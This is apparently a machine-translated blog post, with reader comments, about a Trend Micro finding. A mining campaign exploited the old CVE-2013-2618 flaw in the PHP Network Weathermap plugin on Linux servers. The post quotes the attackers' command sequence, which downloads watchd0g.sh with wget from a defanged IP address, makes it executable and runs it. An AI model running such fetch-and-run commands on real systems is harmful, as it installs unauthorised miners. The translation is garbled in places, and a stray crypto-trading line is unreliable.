This from the cryptocurrency miner with the use of remote computers without authorization of the owners of these is becoming a trend. I have already talked about this on a few occasions here on the blog about this type of situation.
And it is that this has already gotten completely out of control from the moment that cryptocurrencies have taken quite a considerable place and value, people with enough knowledge to access computers that violate their security have put aside wasting time looking for important information or bank accounts to obtain a monetary benefit.
Instead of doing this they opt for the simplest thing in taking control of these teams and uniting them in a mining network and also for other tasks that they commonly do with a botnet.
In this way it is usually more to renumber you, they are only focusing on the instant money that this generates.
With smart understanding of market trends and proper knowledge of crypto trading, one can reap great benefits.
Is Linux really a secure system?
Many of us have the idea that Linux is an almost perfect secure operating system, the reality is that it still has some flaws.
Well hassome days TrendMicro made a find, in which revealed a new flaw in Linux systems that gave hackers the advantage of mining cryptocurrencies using Linux servers and machines.
In a statement through your blog they commented the following:
Through our monitoring related to incident response, we observed intrusion attempts whose indicators we were able to correlate with a previous cryptocurrency mining campaign that used the JenkinsMiner malware.
The difference: this campaign is targeting Linux servers. It's also a classic case of reused vulnerabilities, exploiting an outdated security flaw whose patch has been available for nearly five years.
In this release through your analysis managed to identify the affected sites for this failure that It mainly affects Japan, Taiwan, China, the USA and India.
Attack analysis
Through analysis by Trend Micro Smart Protection Network detail a bit on how attackers take advantage of this flaw:
The operators of this campaign were exploiting CVE-2013-2618, a dated vulnerability in the Camapi Network Weathermap plugin, which system administrators use to visualize network activity.
As for why they are exploiting an old security flaw: Network Weathermap has only two publicly reported vulnerabilities thus far, both from June 2014.
These attackers may be taking advantage of not only a security flaw for which an exploit is available but also the patch delay that occurs in organizations using the open source tool.
Basically the attack is via an XSS attack:
The fuzzy part is the attack target, a web server with a port.
The file /plugins/weathermap/configs/conn.php is the file resulting from the persistent XSS attack on / plugins / weathermap / php .
In addition to conn.php Initially, we see a similar HTTP request applied to a page called ' cools.php '.
The cryptocurrency mining program is distributed through the vulnerability from the PHP weather map on targets that are Linux servers
In the image you can see how the attack is generated and it is described as follows:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
What it does is send the indication to download a file with wget, which is a utility that almost all Linux distributions have installed by default.
chmod 775 watchd0g.sh
makes the file executable
./watchd0g.sh
What it ultimately does is get the file to run on the server.
Fortunately, there is already a patch ( CVE-2013-2618 ) available for failure and You can download it from this link.
Si you want to know more about it of this failure you can visit this link.
Source: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers
Being an idiot is not safe, and despite that Linux saves you.
Not updating security patches is not Linux's fault. It's the fault that some companies, to save money, hire idiots as system administrators,
But even so, it IS DETECTED IMMEDIATELY and is solved right away, even any minor security incident like this is published.
And what fault does Linux have that its updates are not applied? GNU / Linux developers do their job by developing solutions to emerging vulnerabilities and making them available to users. If the doctor prescribes you a flu vaccine and you don't get it, you get sick and stiff… is it the doctor's fault?
DesdeLinux It is not what it was, two news stories in a row with two important errors:
1.- In better editors to develop they put one that is not free software and they forget others that are (they are cited in the comments).
2.- Tremendous news about viruses when they only affect NON UPDATED servers. But if any linux has been updated by default for decades. To put fear as if a Windows-style sucking antivirus were needed. They seem to be trying to say that Linux is the same as Windows and not.
If a bug is old and has already been patched, it is neither news nor nothing. Do not play Microsoft and antivirus companies such as Trend Micro, Norton, Panda or McAffee, or get paid.
By the way, we were using Trend Micro for several years in the company and it was a real potato, a mess, because its system said that an executable had "traces" of viruses (something that could be a virus, even if it was not) and why it did remove it (it took it to a directory so it wouldn't run) not allowing its use, and it didn't have any whitelist to unblock this behavior with a safe executable file that we needed to use. Go shit. It was the corporate version, the individual version did have this whitelist possibility. Pathetic.
Don't describe yourself so elegantly.
The article talks about a security hole that allows you to enter a program, make it executable and run it, which is the security hole that every virus needs to spread, obviously to be a virus it would need that the program entered has in its code the possibility of scan computers on the network to repeat the operation and self-copy. They do not exactly do this because in Linux the security holes discovered are covered by a security patch, and that is what I mean by the difference between Windows and Linux, since an antivirus is not necessary, but to cover the hole. In Windows it is more difficult for several reasons: 1.- The files can become executable simply because of their extension, eliminating a step for their introduction on the affected computer. 2.- Users are continually installing programs of doubtful origin because they are proprietary and need to have them without paying (I am not saying anything what it would be for a home economy to buy MS Office, Photoshop, ... more than doubling the cost of computer equipment). 3.- Sooner or later the Windows will flush, the user takes it to the neighbor, friend, ... who, in order not to waste time, formats everything and installs the Windows ultimate with an activation patch that is not updated or that the patch itself puts a spy program. It could be that it is not and it is great, but it could be that it is and you have a Windows spying on your passwords. In the article they mention the introduction system in a linux affected by the vulnerability, making the program that automatically scans the network and uses it to copy itself and run on the server is the easiest part of all, for that reason what has been said in the article is the most important step for any virus: knowing the vulnerability of the system to attack.
Bad information. This is not a bug in Linux, it is a bug in a PHP APPLICATION, that is, it is multiplatform. It is not even exclusive to systems running the linux kernel! But even if the application was not cross-platform, it would not be a Linux bug, it would be merely an application.
The Linux kernel does not have the slightest interference in protecting against cross-site scripting attacks like this one. At least investigate FIVE MINUTES before posting because the truth that to anyone who knows a little about something, you are going to look bad.